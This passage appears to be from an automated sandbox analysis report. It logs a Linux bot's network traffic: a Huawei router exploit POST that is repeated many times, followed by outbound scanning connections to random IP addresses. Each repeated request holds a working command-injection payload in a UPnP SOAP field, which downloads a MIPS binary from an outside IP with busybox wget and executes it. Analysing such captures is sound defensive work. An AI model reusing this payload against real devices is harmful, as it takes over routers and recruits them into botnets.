6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficTCP traffic: 192.168.2.14:46540 -> 185.125.190.26:443
              Source: unknownTCP traffic detected without corresponding DNS query: 41.79.20.241
              Source: unknownTCP traffic detected without corresponding DNS query: 197.117.40.241
              Source: unknownTCP traffic detected without corresponding DNS query: 197.133.36.111
              Source: unknownTCP traffic detected without corresponding DNS query: 41.197.172.241
              Source: unknownTCP traffic detected without corresponding DNS query: 156.168.223.119
              Source: unknownTCP traffic detected without corresponding DNS query: 197.18.235.27
              Source: unknownTCP traffic detected without corresponding DNS query: 41.170.30.183
              Source: unknownTCP traffic detected without corresponding DNS query: 156.125.211.30
              Source: unknownTCP traffic detected without corresponding DNS query: 197.33.124.181
              Source: unknownTCP traffic detected without corresponding DNS query: 197.158.27.73
              Source: unknownTCP traffic detected without corresponding DNS query: 156.67.239.183
              Source: unknownTCP traffic detected without corresponding DNS query: 156.226.12.30
              Source: unknownTCP traffic detected without corresponding DNS query: 156.109.0.55
              Source: unknownTCP traffic detected without corresponding DNS query: 41.146.71.68
              Source: unknownTCP traffic detected without corresponding DNS query: 197.112.240.206
              Source: unknownTCP traffic detected without corresponding DNS query: 197.235.8.186
              Source: unknownTCP traffic detected without corresponding DNS query: 156.16.175.101
              Source: unknownTCP traffic detected without corresponding DNS query: 197.153.88.73
              Source: unknownTCP traffic detected without corresponding DNS query: 156.112.241.178
              Source: unknownTCP traffic detected without corresponding DNS query: 156.109.2.30
              Source: unknownTCP traffic detected without corresponding DNS query: 41.0.201.93
              Source: unknownTCP traffic detected without corresponding DNS query: 197.103.12.224
              Source: unknownTCP traffic detected without corresponding DNS query: 197.115.185.232
              Source: unknownTCP traffic detected without corresponding DNS query: 41.98.170.196
              Source: unknownTCP traffic detected without corresponding DNS query: 156.253.22.172
              Source: unknownTCP traffic detected without corresponding DNS query: 156.77.138.79
              Source: unknownTCP traffic detected without corresponding DNS query: 41.179.176.65
              Source: unknownTCP traffic detected without corresponding DNS query: 41.161.235.104
              Source: unknownTCP traffic detected without corresponding DNS query: 197.174.148.185
              Source: unknownTCP traffic detected without corresponding DNS query: 197.253.168.147
              Source: unknownTCP traffic detected without corresponding DNS query: 156.190.186.17
              Source: unknownTCP traffic detected without corresponding DNS query: 197.198.156.243
              Source: unknownTCP traffic detected without corresponding DNS query: 197.241.131.120
              Source: unknownTCP traffic detected without corresponding DNS query: 156.73.77.88
              Source: unknownTCP traffic detected without corresponding DNS query: 197.143.96.116
              Source: unknownTCP traffic detected without corresponding DNS query: 41.194.169.6
              Source: unknownTCP traffic detected without corresponding DNS query: 41.3.135.97
              Source: unknownTCP traffic detected without corresponding DNS query: 41.202.231.52
              Source: unknownTCP traffic detected without corresponding DNS query: 156.119.146.174
              Source: unknownTCP traffic detected without corresponding DNS query: 41.133.250.50
              Source: unknownTCP traffic detected without corresponding DNS query: 197.219.160.109
              Source: unknownTCP traffic detected without corresponding DNS query: 41.82.238.206
              Source: unknownTCP traffic detected without corresponding DNS query: 156.18.202.162
              Source: unknownTCP traffic detected without corresponding DNS query: 156.200.181.229
              Source: unknownTCP traffic detected without corresponding DNS query: 156.231.38.101
              Source: unknownTCP traffic detected without corresponding DNS query: 41.164.83.142
              Source: unknownTCP traffic detected without corresponding DNS query: 197.139.243.135
              Source: unknownTCP traffic detected without corresponding DNS query: 197.222.221.189
              Source: unknownTCP traffic detected without corresponding DNS query: 156.238.129.165
              Source: unknownTCP traffic detected without corresponding DNS query: 156.254.160.136
              Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
